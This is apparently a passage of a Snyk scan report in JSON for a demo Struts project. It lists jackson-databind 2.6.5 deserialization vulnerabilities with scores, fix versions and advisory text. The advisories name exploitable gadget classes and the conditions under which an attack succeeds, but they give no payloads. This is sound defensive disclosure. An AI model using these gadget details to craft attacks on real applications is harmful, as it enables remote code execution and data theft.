"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.585105Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.933985Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:17.355553Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.585105Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.springframework.aop.config.MethodLocatingFactoryBean` (aka `spring-aop`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issues](https://github.com/FasterXML/jackson-databind/issues/2680)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.92902", + "probability": "0.05021", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11619" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-27xj-rqx5-2255" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-04-08T10:59:04.995807Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-04-08T00:42:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-04-08T00:42:25Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.585105Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "XuYuanzhen" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2704", + "title": "Github Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:25.351249Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.587184Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:40.439153Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:25.351249Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.587184Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool` (`xalan2`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70)\n- [Github Issue](https://github.com/FasterXML/jackson-databind/issues/2704)\n", + "epssDetails": { + "percentile": "0.93100", + "probability": "0.05308", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14062" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-c265-37vj-cwcc" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-05-29T15:36:30.302636Z", + "functions_new": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-05-01T15:36:06Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-05-29T15:36:05Z", + 
"severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.587184Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572300", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Al1ex@knownsec" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.5)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2765", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.781685Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 
8.1, + "modificationTime": "2024-03-11T09:53:54.570033Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:46.171514Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.781685Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.570033Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.jsecurity.realm.jndi.JndiRealmFactory`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2765)\n", + "epssDetails": { + "percentile": "0.91500", + "probability": "0.03413", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14195" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mc6h-4qgp-37qh" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-06-14T14:48:40.820120Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.5)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-14T14:45:09Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-06-14T15:32:14Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.570033Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Topsec" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2688", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:42.075545Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + 
"modificationTime": "2024-03-11T09:53:54.574354Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:40.405517Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:42.075545Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.574354Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `oadd.org.apache.xalan.lib.sql.JNDIConnectionPool` (`apache/drill`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2688)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.94931", + "probability": "0.10105", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14060" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-j823-4qch-3rgm" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-06-15T10:29:46.691157Z", + "functions_new": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-15T10:23:33Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + 
"groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-06-15T15:46:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.574354Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2698", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.681468Z" + }, + { + 
"assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.565244Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.989304Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.681468Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.565244Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using any of the following class gadget available within `weblogic/oracle-aqjms` if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\n* oracle.jms.AQjmsQueueConnectionFactory\r\n* oracle.jms.AQjmsXATopicConnectionFactory\r\n* oracle.jms.AQjmsTopicConnectionFactory\r\n* oracle.jms.AQjmsXAQueueConnectionFactory\r\n* oracle.jms.AQjmsXAConnectionFactory\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
